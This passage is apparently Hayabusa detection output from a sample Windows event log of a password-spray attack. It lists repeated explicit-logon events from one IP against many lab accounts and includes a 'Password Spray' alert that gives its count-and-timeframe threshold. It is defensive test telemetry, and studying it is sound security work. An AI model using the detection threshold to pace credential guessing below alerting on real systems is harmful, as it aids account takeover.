
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:edygert/jlake/drook/mdouglas/cspizor/cragoso/baker/ssims/jorchilles/bking/smisenar/dmashburn/bgreenwood/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target 
Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source 